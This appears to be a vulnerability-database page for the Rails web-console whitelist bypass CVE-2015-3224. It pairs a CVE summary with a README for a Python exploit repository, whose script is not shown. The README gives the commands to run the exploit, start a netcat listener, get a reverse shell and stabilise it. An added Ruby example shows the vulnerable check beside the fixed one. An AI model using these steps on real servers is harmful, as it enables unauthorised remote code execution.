Related vulnerability
Title:
Ruby on Rails Web Console code injection vulnerability
(CVE-2015-3224)
Description: Ruby on Rails (Rails) is an open-source web application framework written in Ruby and maintained by the Rails core team; David Heinemeier Hansson extracted it from Basecamp, the project-management tool of the US company 37signals. Web Console is a Rails plugin that exposes an interactive Ruby console in the browser, in the context of the running application, for use during development. The `request.rb` file of the Web Console used with Ruby on Rails contains a security vulnerability: when determining the client IP address, the program does not restrict use of the `X-Forwarded-For` header. A remote attacker can send a specially crafted request to exploit this vulnerability.
Description
Ruby on Rails Web Console Exploit (CVE-2015-3224)
Introduction
# Ruby on Rails Web Console Exploit (CVE-2015-3224)

This repository contains a **Python script** that exploits the **IP whitelist bypass** (CVE-2015-3224) in the development web console shipped with **Ruby on Rails 4.0.x and 4.1.x** (the `web-console` gem before version 2.1.3). Because the console evaluates arbitrary Ruby inside the application process, bypassing the whitelist gives **remote code execution** on the server.
> ⚠️ **Disclaimer**
> This script is intended for educational purposes and authorized security testing only.
> **Do not** use it on any system without explicit permission.
> The authors are **not responsible** for any misuse or damage caused by this script.
---
## 📌 Description of the Vulnerability
The web console in vulnerable versions of Ruby on Rails is a development-only feature that is meant to be reachable solely from the IP addresses in its whitelist (by default, the local machine). Vulnerable versions, however, derive the client address from the `X-Forwarded-For` HTTP header, which any client can set. A remote attacker who sends `X-Forwarded-For: 127.0.0.1` (or `::1`) is therefore treated as a trusted local user; the whitelist is bypassed and the console evaluates attacker-supplied Ruby in the application process, which is **remote code execution**. Two practical caveats: the console is only exposed when the `web-console` gem is loaded, typically in the development environment (it appears on error pages and wherever a view calls `console`), so a production application that never loads the gem is not reachable this way; and the fix is to upgrade to web-console 2.1.3 or later, where the whitelist check no longer trusts the forwarded header.
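To make the bypass concrete, here is a simplified model of the whitelist check written for this page; it is an added example, not the `web-console` gem's own `request.rb`. It places the vulnerable pattern (taking the client address from `X-Forwarded-For`) beside the hardened one (using only `REMOTE_ADDR`, the address of the TCP peer, which a header cannot forge). The module name `ConsoleAccess`, the method names and the three sample Rack environments are assumptions constructed for the example.

```ruby
require "ipaddr"

# Added example: a minimal model of an IP-whitelist check for a development
# console. Not the web-console gem's code; it reproduces the behaviour the
# README describes (trusting X-Forwarded-For) next to the hardened form.
module ConsoleAccess
  # Loopback-only whitelist, the kind of default a development console ships with.
  DEFAULT_WHITELIST = [IPAddr.new("127.0.0.0/8"), IPAddr.new("::1")].freeze

  # Vulnerable: when X-Forwarded-For is present, the leftmost hop is treated as
  # the client. That value is chosen entirely by whoever sent the request.
  def self.client_ip_vulnerable(env)
    xff = env["HTTP_X_FORWARDED_FOR"]
    return env["REMOTE_ADDR"] if xff.nil? || xff.strip.empty?
    xff.split(",").first.strip
  end

  # Hardened: only the socket peer address is consulted. A client cannot set
  # REMOTE_ADDR; only a trusted reverse proxy in front of the app could, and
  # then the whitelist should name the proxy, not rely on forwarded headers.
  def self.client_ip_strict(env)
    env["REMOTE_ADDR"]
  end

  # True if +ip+ falls inside any whitelisted network of the same family.
  # Malformed input is treated as "not permitted" rather than raising.
  def self.permitted?(ip, whitelist = DEFAULT_WHITELIST)
    addr = IPAddr.new(ip.to_s)
    whitelist.any? { |net| net.family == addr.family && net.include?(addr) }
  rescue IPAddr::Error
    false
  end

  # The access decision the console would make for a request.
  def self.console_allowed?(env, strict:)
    ip = strict ? client_ip_strict(env) : client_ip_vulnerable(env)
    permitted?(ip)
  end

  # Constructed sample Rack environments (not captured traffic).
  # 203.0.113.5 is a documentation address standing in for a remote attacker.
  SPOOFED = { "REMOTE_ADDR" => "203.0.113.5",
              "HTTP_X_FORWARDED_FOR" => "127.0.0.1" }.freeze
  LOCAL   = { "REMOTE_ADDR" => "127.0.0.1" }.freeze
  REMOTE  = { "REMOTE_ADDR" => "203.0.113.5" }.freeze
end

if __FILE__ == $PROGRAM_NAME
  [[:spoofed, ConsoleAccess::SPOOFED],
   [:local,   ConsoleAccess::LOCAL],
   [:remote,  ConsoleAccess::REMOTE]].each do |name, env|
    puts format("%-8s vulnerable=%-5s strict=%s", name,
                ConsoleAccess.console_allowed?(env, strict: false),
                ConsoleAccess.console_allowed?(env, strict: true))
  end
end
```

The spoofed request is the one this repository's script sends: a remote peer with `X-Forwarded-For: 127.0.0.1`. The vulnerable check admits it, the strict check rejects it, and both checks still admit a genuinely local request, so the fix costs nothing for the intended use.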
---
## 🚀 Features
- **Easy to Use**: Simple command-line interface.
- **Dynamic Path Discovery**: Automatically probes the target to find the dynamic console session path.
- **Two Shell Modes**:
- **Simple Shell**: A basic, non-interactive shell for quick commands.
- **Reverse TTY Shell**: A one-line command to get a fully interactive PTY reverse shell.
- **Enhanced Readability**: Color-coded output for status messages, successes, and errors.
- **Robust**: Includes error handling for network issues and failed commands.
---
## ✅ Requirements
- Python 3
- `requests` library
Install `requests`:
```bash
pip install requests
```
---
## ⚙️ Usage
1. **Clone the repository:**
```bash
git clone https://github.com/Sic4rio/CVE-2015-3224
cd <repo-directory>
```
2. **Make the script executable:**
```bash
chmod +x exploit.py
```
### Option 1: Simple Interactive Shell
This mode is useful for running quick, simple commands.
```bash
./exploit.py -t http://<TARGET_IP>:<PORT>
```
### Option 2: Full Interactive TTY (Reverse Shell)
This is the recommended mode for a stable, fully interactive shell.
#### Step 1: Start a Listener
On your local machine, open a new terminal and start a `netcat` listener.
```bash
nc -lvnp 9001
```
#### Step 2: Run the Exploit
In another terminal, run the script with the `--rev-shell` flag, providing your local IP (`lhost`) and port (`lport`).
```bash
./exploit.py -t http://<TARGET_IP>:<PORT> --rev-shell --lhost <YOUR_IP> --lport 9001
```
#### Step 3: Stabilize the Shell
A connection will arrive at your `netcat` listener. To upgrade it to a fully interactive TTY, follow these steps *in the netcat window* (the reverse shell is already spawned under a PTY on the target, so no extra `pty.spawn` step is needed):
1. **Background the shell** by pressing `Ctrl+Z`.
2. **Set your local terminal to raw mode** and bring the shell to the foreground.
```bash
stty raw -echo; fg
```
Press `Enter` if the prompt doesn't reappear.
3. **Set the terminal properties** on the remote shell.
```bash
reset
export SHELL=bash
export TERM=xterm-256color
stty rows 50 cols 120
```
You now have a fully functional and stable shell!
---
## 👥 Credits
- **Original Exploit**: Eval (@0xEval)
- **The Readme.md file**: GPT
File snapshot
[4.0K] /data/pocs/7f38343f7d3d910c6e18a503265e253a048536d4
├── [6.5K] exploit.py
└── [3.3K] README.md
0 directories, 2 files